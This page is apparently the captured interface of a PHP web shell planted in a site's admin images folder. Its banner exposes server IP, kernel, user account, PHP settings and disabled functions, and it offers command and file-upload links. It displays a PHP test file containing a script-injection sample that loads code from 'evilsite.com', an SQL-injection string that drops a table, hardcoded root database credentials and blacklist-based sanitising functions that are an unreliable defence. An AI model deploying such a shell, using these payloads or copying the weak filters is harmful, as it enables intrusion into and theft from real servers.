|
Server IP : 124.109.2.77 / Your IP : 216.73.216.49 Web Server : Apache/2 System : Linux ns4.amiprocorp.com 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : cpctlp ( 1020) PHP Version : 5.6.40 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : ON | cURL : ON | WGET : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/wget) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 329 OFF | Perl : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/perl) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 335 OFF | Python : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/python2) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 341 OFF Directory (0755) : /home/cpctlp/domains/cpctlphp.com/public_html/admin/js/../build/../Connections/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE> New Document </TITLE>
<META NAME="Generator" CONTENT="EditPlus">
<META NAME="Author" CONTENT="">
<META NAME="Keywords" CONTENT="">
<META NAME="Description" CONTENT="">
</HEAD>
<BODY>
<?php
function CleanInput($input) {
$search = array(
'@<script[^>]*?>.*?</script>@si', // Strip out javascript
'@<style[^>]*?>.*?</style>@siU', // Strip style tags properly
'@<![\s\S]*?--[ \t\n\r]*>@' // Strip multi-line comments
);
/* '@<[\/\!]*?[^<>]*?>@si', // Strip out HTML tags */
$input = stripslashes($input);
$output = preg_replace($search, '', $input);
return $output;
}
$bad_string = "Hi! <script src='http://www.evilsite.com/bad_script.js'></script> <B>It's a good day!</B>";
echo $good_string = cleanInput($bad_string);
// $good_string returns "Hi! It\'s a good day!"
// Cross Site Script & Code Injection Sanitization
function mysql_escape_mimic($inp) {
$injectTxt = array('UNION','INSERT','DELETE','DROP',' or' ,' Or',' OR',' and',' And',' aNd',' anD' ,' ANd',' AND',' aNd',' anD');
$inp = str_replace($injectTxt,"", $inp);
if(is_array($inp))
return array_map(__METHOD__, $inp);
if(!empty($inp) && is_string($inp)) {
return str_replace(array('\\', "\0", "\n", "\r", "'", '"', "\x1a"), array('\\\\', '\\0', '\\n', '\\r', "\\'", '\\"', '\\Z'), $inp);
}
return $inp;
}
$v=" 105 or 1=1'; DROP TABLE test; -- ' AND password = ' ";
$link = mysqli_connect("127.0.0.1", "root", "1234", "tt");
//echo $username = mysqli_real_escape_string($link, $v);
$var=" SELECT * FROM test WHERE id = '$v' ";
echo mysql_escape_mimic($var);
?>
</BODY>
</HTML>